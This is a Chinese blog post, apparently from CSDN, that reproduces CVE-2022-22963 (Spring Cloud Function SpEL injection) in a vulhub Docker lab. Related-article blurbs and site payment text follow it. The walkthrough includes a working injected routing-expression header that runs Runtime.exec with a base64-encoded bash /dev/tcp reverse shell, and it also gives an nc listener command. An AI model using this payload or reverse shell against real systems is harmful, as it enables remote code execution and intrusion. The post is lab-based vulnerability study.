CVE-2022-22963漏洞复现

已于 2025-01-18 23:13:59 修改
阅读量835 收藏 1
点赞数 10
分类专栏: CVE漏洞复现 文章标签: 安全 网络安全 linux
于 2024-12-23 14:19:46 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/XXXXsssxwd/article/details/144652745
版权

CVE-2022-22963 漏洞简介:

由于Spring CloudFunction中RoutingFunction类的apply方法将请求头中的"spring.cloud.function.routing-expression"参数作为Spel表达式进行处理,造成了Spel表达式注入漏洞,当使用路由功能时,攻击者可利用该漏洞远程执行任意代码。

影响版本:

3.0.0.RELEASE <= Spring Cloud Function <= 3.2.2

漏洞

通过网盘分享的文件:vulhub-master.zip
链接: https://pan.baidu.com/s/1-ESOp-7sXIxhhzi19deO_w?pwd=1111 
提取码: 1111 

1.1:开始使用docker-compose up -d

在这里插入图片描述
在这里插入图片描述

这里我们访问本地IP的8080端口即可

在这里插入图片描述

出现页面说明漏洞复现成功了,这是一个错误代码的界面

我们打开burp,在这个页面进行抓包,将页面路径改成:

在这里插入图片描述

我们修改完成后放到Repeater模块,进行模块代发
我们加入以下内容:
spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("要执⾏的命令")

利用反弹shell的性质构建一个反弹shell语句再使用base64加密:
bash -i >& /dev/tcp/监听机IP/9999 0>&1

在这里插入图片描述

进行利用:
语句:spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec
("bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjExMS4xNzQvOTk5OSAwPiYx}|{base64,-d}|{bash,-i}")

在这里插入图片描述

开启监听
nc -lvp 9999

在这里插入图片描述

最后一步发送模块即可

在这里插入图片描述

拿下靶机
总结:
1.学会了远程代码执行的利用
2.学会了base64加密上传后解密执行的利用
CVE-2022-22963 Spring Cloud Function SPEL表达式注入漏洞复现
afei001
03-31 4317
SpringCloudFunction是SpringBoot开发的一个Servless中间件(FAAS),支持基于SpEL的函数式动态路由。当Spring Cloud Function 启用动态路由functionRouter时, HTTP请求头 spring.cloud.function.routing-expression参数存在SPEL表达式注入漏洞,攻击者可通过该漏洞进行远程命令执行。
Spring Cloud Function SpEL表达式命令注入(CVE-2022-22963漏洞复现
weixin_54786196的博客
10-27 516
Spring Cloud Function是一个用于构建和部署基于函数的微服务的框架。它使用SpEL表达式来处理函数的输入和输出。SpEL是一种强大的表达式语言,它允许开发人员在运行时动态地计算表达式。由于Spring CloudFunction中RoutingFunction类的apply方法将请求头中的"spring.cloud.function.routing-expression"参数作为Spel表达式进行处理,造成了Spel表达式注入漏洞,当使用路由功能时,攻击者可利用该漏洞远程执行任意代码。
SpringCloud Function SpEL漏洞复现 (CVE-2022-22963)
oiadkt的博客
04-21 1479
SpringCloud Function SpEL漏洞复现 (CVE-2022-22963)
漏洞复现笔记(CVE-2022-22963
weixin_72760965的博客
06-14 512
Spring Cloud Function 提供了一个通用的模型,用于在各种平台上部署基于函数的软件,包括像 Amazon AWS Lambda 这样的 FaaS(函数即服务,function as a service)平台。当Spring Cloud Function 启用动态路由functionRouter时, HTTP请求头spring.cloud.function.routing-expression参数存在SPEL表达式注入漏洞,攻击者可通过该漏洞进行远程命令执行。影响版本漏洞简介。
Spring Cloud Function SpEL表达式命令注入(CVE-2022-22963
最新发布
qq_62691506的博客
04-06 142
由于Spring CloudFunction中RoutingFunction类的apply方法将请求头中的"spring.cloud.function.routing-expression"参数作为Spel表达式进行处理,造成了Spel表达式注入漏洞,当使用路由功能时,攻击者可利用该漏洞远程执行任意代码。将反弹shell bash -i >& /dev/tcp/监听机ip/监听端口号 0>1& 进行base64加密。出现错误页面,利用burp抓包修改请求路径方法。
vulhub spring 远程命令执行漏洞CVE-2022-22963
2401_82451607的博客
09-08 516
vulhub spring 远程命令执行漏洞CVE-2022-22963
Spring Cloud Function SpEL 代码注入(CVE-2022-22963)漏洞复现
Pluto.的博客
11-21 1101
Spring Cloud Function SpEL 代码注入 (CVE-2022-22963)
春秋云境:CVE-2022-22963[漏洞复现]
如有错误感谢斧正
08-10 1260
到2024年8月11日,为期14天的专项国护结束最近都在忙攻防看1day、nday复现,现在有空了写一下靶场的复现
【vulhub系列】CVE-2022-22963 Spring Cloud Function SpEL 远程代码执行漏洞复现
Wiofgb的博客
08-28 3308
记录一次CVE-2022-22963 Spring Cloud Function SpEL 远程代码执行漏洞复现
CVE-2022-22963 复现Demo
04-14
CVE-2022-22963 复现Demo,A Spring MVC or Spring WebFlux application running on JDK 9+ may be vulnerable to remote code execution (RCE) via data binding. The specific exploit requires the application ...
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC
08-10
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC CVE-2022-33891 影响版本 Apache spark version 3.1.1版本 Apache Spark version>= 3.3.0 修复方案 1.建议升级到安全版本,参考官网链接: ...
春秋云境 CVE-2022-4230 夺旗
05-02
**CVE-2022-4230** 是一个存在于 **WP Statistics** WordPress 插件(版本13.2.9及以前)中的安全漏洞。该漏洞的主要原因是插件在处理特定参数时没有进行充分的数据转义,从而导致SQL注入攻击成为可能。具体来说: ...
WordPress 5.8.3 SQL注入漏洞 CVE-2022-21661.pdf
09-27
【WordPress 5.8.3 SQL注入漏洞 CVE-2022-21661】是一个近期发现的安全问题,涉及到WordPress的核心函数`WP_Query`。这个漏洞并非直接的SQL注入,但因为`WP_Query`经常被WordPress插件广泛使用,所以其潜在的危害...
春秋云境:CVE-2022-22963
一只爱吃橙子的羊
01-20 1065
SpringCloudFunction是SpringBoot开发的一个Servless中间件(FAAS),支持基于SpEL的函数式动态路由。当Spring Cloud Function 启用动态路由functionRouter时, HTTP请求头spring.cloud.function.routing-expression参数存在SPEL表达式注入漏洞,攻击者可通过该漏洞进行远程命令执行。 题目链接为:http://ip:port P.S 卡慢不影响拿flag
CVE-2022-22963 Spring Cloud Function SpEL 远程代码执行 漏洞复现
热爱学习,喜欢折腾!
08-28 5689
SpringCloud 是一套分布式系统的解决方案,实现就是函数式编程,在视频转码、音视频转换、数据仓库ETL等与状态相关度低的领域运用的比较多。开发者无需关注服务器环境运维等问题上,专注于自身业务逻辑实现即可。在Spring Cloud Function版本3.1.6,3.2.2和更早的不受支持的版本中,当使用路由功能时,用户可以提供特制的SpEL作为路由表达式,这可能导致远程执行代码和访问本地资源。............
CVE-2022-22963-Spring-Core-RCE图形化利用工具
热门推荐
LiBai'S BLOG
04-01 1万+
CVE-2022-22963 描述:Spring4Shell - Spring Core RCE - CVE-2022-22965 链接:https://github.com/TheGejr/SpringShell 描述:Spring4Shell Proof Of Concept/Information CVE-2022-22965 链接:https://github.com/BobTheShoplifter/Spring4Shell-POC 描述:This includes CVE-2022-22
[春秋云镜]CVE-2022-22963
niubi707的博客
11-29 807
[春秋云镜]CVE-2022-22963复现
cve-2022-41741漏洞复现
08-24
根据引用的信息,CVE-2022-41741漏洞是在ngx_http_mp4_module中存在的一个内存损坏和内存泄漏的问题。该漏洞已经在nginx-1.23.2主线版中得到修复。因此,要复现CVE-2022-41741漏洞,首先需要使用受影响的版本(例如nginx-1.23.1及之前的版本),然后使用ngx_http_mp4_module模块进行相关操作,即可复现漏洞。请注意,为了保障系统的安全性,我们强烈建议及时更新至最新版本的NGINX,并避免使用已知存在漏洞的旧版本。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *3* [立即升级 NGINX 以应对漏洞风险](https://blog.youkuaiyun.com/m0_58461993/article/details/127432416)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *2* [远程执行代码漏洞(CVE-2018-0886)漏洞修复](https://download.youkuaiyun.com/download/liuxs1230/88237267)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值